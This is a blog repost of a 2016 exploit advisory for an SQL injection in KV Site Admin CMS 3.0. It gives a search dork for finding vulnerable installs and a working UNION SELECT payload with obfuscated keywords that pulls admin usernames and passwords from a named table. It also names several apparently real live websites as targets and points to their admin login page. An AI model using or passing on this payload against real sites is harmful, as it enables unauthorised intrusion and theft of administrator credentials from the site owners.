KV Site Admin CMS 3.0 SQL injection Vulnerability

Daftar Isi Artikel
##################### # Exploit Title : KV Site Admin CMS 3.0 SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : e.World Technology Ltd. All rights reserved "Admin Area - Version 3.0" # Version: 3.0 # MyBlog: http://xbadgirl21.blogspot.com # Tested on: [ BackBox] # skype:xbadgirl21 # Video Proof : https://youtu.be/43TuHcB_Kec # Date: 26/08/2016 ##################### # [+] DESCRIPTION : ##################### # [+] an SQL injection been Detected in KV Site Admin CMS 3.0 after you add ['] to the # [+] Vuln Target Parameter you will get error like : # [+] You have an error in your SQL syntax; check the manual that corresponds to your # [+] MySQL server version for the right syntax to use near '\'' at line 1 ##################### # [+] Poc : ##################### # [page_code_no] Get Parameter Vulnerable To SQLi #--------------------- # http://www.site.com/index-h.php?page_code_no=[SQLi] ----------------------- # http://www.kvrihandnagar.org/index-h.php?page_code_no=19' # http://www.kvrihandnagar.org/index-h.php?page_code_no=-19 /*!12345union*/ select 1,2,/*!12345group_coNcat(username,0x3a,password)*/,4 from 01_admin_detail-- ###################### # [+] Live Demo : ###################### + http://www.kvmughalsarai.org/index-h.php?page_code_no=40' + http://www.kvsrovns.org/index-h.php?page_code_no=1' ###################### # Admin Panel : http://www.site.com/kv_admin/login.php ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere #######################

★★★★

There is no other posts in this category.

Silahkan Komentar dengan bahasa yang sopan :)

  1. Untuk membuat judul komentar, gunakan <i rel="h2">Judul Komentar</i>
  2. Untuk membuat kotak catatan, <i rel="quote">catatan</i>
  3. Untuk membuat teks stabilo, <i rel="mark">mark</i>
  4. Untuk membuat teks mono, <i rel="kbd">kbd</i>
  5. Untuk membuat kode singkat, <i rel="code">shorcode</i>
  6. Untuk membuat kode panjang, <i rel="pre"><i rel="code">potongan kode</i></i>
  7. Untuk membuat teks tebal, <strong>tebal</strong> atau <b>tebal</b>
  8. Untuk membuat teks miring, <em>miring</em> atau <i>miring</i>